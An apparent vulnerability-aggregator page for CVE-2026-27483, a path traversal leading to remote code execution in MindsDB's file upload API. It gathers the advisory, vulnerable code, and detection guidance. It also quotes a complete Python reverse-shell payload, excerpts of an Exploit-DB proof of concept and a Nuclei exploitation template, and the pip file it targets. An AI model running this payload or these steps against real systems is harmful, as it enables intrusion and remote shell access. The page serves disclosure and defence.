CVE-2026-27483
published 2026-02-24CVE-2026-27483: MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in…
PriorityP179high8.8CVSS 3.1
AVNACLPRLUINSUCHIHAH
EXPLOIT
EPSS
11.11%
95.4th percentile
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.9.1.1, there is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution. The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. Since the multipart file upload does not perform security checks on the uploaded file path, an attacker can perform path traversal by using `../` sequences in the filename field. The file write operation occurs before calling clear_filename and save_file, meaning there is no filtering of filenames or file types, allowing arbitrary content to be written to any path on the server. Version 25.9.1.1 patches the issue.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mindsdb | mindsdb | < 25.9.1.1 | 25.9.1.1 |
| mindsdb | mindsdb | >= 0 < 25.9.1.1 | 25.9.1.1 |
Detection & IOCsextracted from sources · hover to see the quote
commandimport os,pty,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost}",{lport}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")↗
- →Detect multipart PUT requests to /api/files/* where the filename field in the Content-Disposition header contains path traversal sequences (../). ↗
- →Alert on PUT /api/files requests where the multipart filename parameter resolves to a path outside the intended upload directory, especially targeting Python site-packages (e.g., pip/__init__.py). ↗
- →Monitor for a POST to /api/handlers/<handler>/install returning HTTP 500 with body containing 'Failed to install dependencies' shortly after a suspicious PUT /api/files upload — this two-step sequence is the RCE trigger pattern. ↗
- →Flag HTTP 400 responses containing 'Not supported format' from /api/files PUT requests as a successful path-traversal payload upload indicator (the exploit treats this as upload success). ↗
- →Insikt Group created a Nuclei template for CVE-2026-27483; defenders can use it to identify vulnerable MindsDB instances (versions >= 25.4.1.0 and < 25.9.1.1). ↗
- →Check the /api/status endpoint response for 'mindsdb_version' to fingerprint vulnerable instances; versions matching >= 25.4.1.0 and < 25.9.1.1 are exploitable. ↗
- ·The path traversal payload specifically targets the Python venv pip package path (venv/lib/python3.10/site-packages/pip/__init__.py) to achieve RCE via handler install; the exact path may vary depending on the server's Python version and venv layout. ↗
- ·Version 25.9.1.1 patches the issue; the PoC explicitly aborts if the detected version is >= 25.9.1.1. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
ghsa·2026-02-24
CVE-2026-27483 [HIGH] CWE-22 MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
### Summary
There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.
### Details
The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:
```python
@ns_conf.route("/")
@ns_conf.param("name", "MindsDB's name for file")
class File(Resource):
@ns_conf.doc("put_file")
@api_endpoint_metrics('PUT', '/files/file')
def put(self, name: str):
"""add new file
params in FormData:
- file
- original_file_name [optional]
"""
data = {}
mindsdb_file_name = name
existing_file_names = ca.file_controller.get_files_names()
OSV
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
osv·2026-02-24
CVE-2026-27483 [HIGH] MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
MindsDB: Path Traversal in /api/files Leading to Remote Code Execution
### Summary
There is a path traversal vulnerability in Mindsdb's /api/files interface, which an authenticated attacker can exploit to achieve remote command execution.
### Details
The vulnerability exists in the "Upload File" module, which corresponds to the API endpoint /api/files. The affected code is located at mindsdb/api/http/namespaces/file.py:
```python
@ns_conf.route("/")
@ns_conf.param("name", "MindsDB's name for file")
class File(Resource):
@ns_conf.doc("put_file")
@api_endpoint_metrics('PUT', '/files/file')
def put(self, name: str):
"""add new file
params in FormData:
- file
- original_file_name [optional]
"""
data = {}
mindsdb_file_name = name
existing_file_names = ca.file_controller.get_files_names()
No detection rules found.
Exploit-DB
MindsDB 25.9.1.1 - Path Traversal
exploitdb·2026-05-04·CVSS 8.8
CVE-2026-27483 [HIGH] MindsDB 25.9.1.1 - Path Traversal
MindsDB 25.9.1.1 - Path Traversal
---
# Exploit Title: MindsDB 25.9.1.1 - Path Traversal
# Date: 06-03-2026
# Exploit Author: Lohitya Pushkar (thewhiteh4t)
# Vendor Homepage: https://mindsdb.com/
# Software Link: https://github.com/mindsdb/mindsdb
# Version: not installed handlers
BANNER = """
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
[>] Found By : XlabAITeam
[>] PoC By : Lohitya Pushkar (thewhiteh4t)
"""
try:
parser = argparse.ArgumentParser()
parser.add_argument("-rh", default="127.0.0.1", help="Target host")
parser.add_argument("-rp", default="47334", help="Target port")
parser.add_argument("-lh", help="Listener host")
parser.add_argument("-lp", default="4444", help="Listener port")
parser.add_argument("-u", help="Username")
parser.add_argument("-
Nuclei
MindsDB - Remote Code Execution
nuclei·CVSS 8.8
CVE-2026-27483 [HIGH] MindsDB - Remote Code Execution
MindsDB - Remote Code Execution
MindsDB = 25.4.1.0", "< 25.9.1.1")'
condition: and
internal: true
- raw:
- |
POST /api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body, "token")'
- 'status_code == 400 && contains(body, "Error in username or password")'
condition: or
internal: true
extractors:
- type: regex
name: token
part: body
group: 1
regex:
- '{"token":\s*"([^"]+)"'
internal: true
- raw:
- |
PUT /api/files/{{filename}} HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryv9dZC0cAHLlHSHD9
Authorization: Bearer {{token}}
Connection: close
------WebKitFormBoundaryv9dZC0cAHLlHSHD9
Content-Disposition: form-da
Recorded Future
March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day
blogs_recorded_future·2026-04-13·CVSS 9.8
[CRITICAL] March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day
## March 2026 CVE Landscape: 31 High-Impact Vulnerabilities Identified, Interlock Ransomware Group Exploits Cisco FMC Zero-Day
In March 2026, Insikt Group® identified 31 high-impact vulnerabilities that should be prioritized for remediation , 29 of which had a Very Critical Recorded Future Risk Score.
These vulnerabilities affected products from the following vendors: Cisco, Microsoft, Google, ConnectWise, Langflow, Citrix, Aquasecurity, Nginx UI, Qualcomm, F5, Craft CMS, Laravel, Apple, Synacor, Wing FTP Server, n8n, Omnissa, SolarWinds, Ivanti, Hikvision, Rockwell, and Broadcom. This month’s most affected vendors were Microsoft and Apple, together accounting for approximately 32% of the 31 vulnerabilities.
One vulnerability ( CVE-2017-7921 affecting Hikvision) is approximately nine ye
Wiz
CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-27483 [HIGH] CVE-2026-27483 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27483 :
Python vulnerability analysis and mitigation
../
Source : NVD
## 8.8
Score
Published February 24, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 94.8
Exploitation Probability (EPSS) 16.3
Affected packages and libraries
mindsdb
Sources
NVD
pip Severity HIGH Has Fix Added at: Feb 25, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35615
CRITICAL
9.2
Python
2026-02-24
Published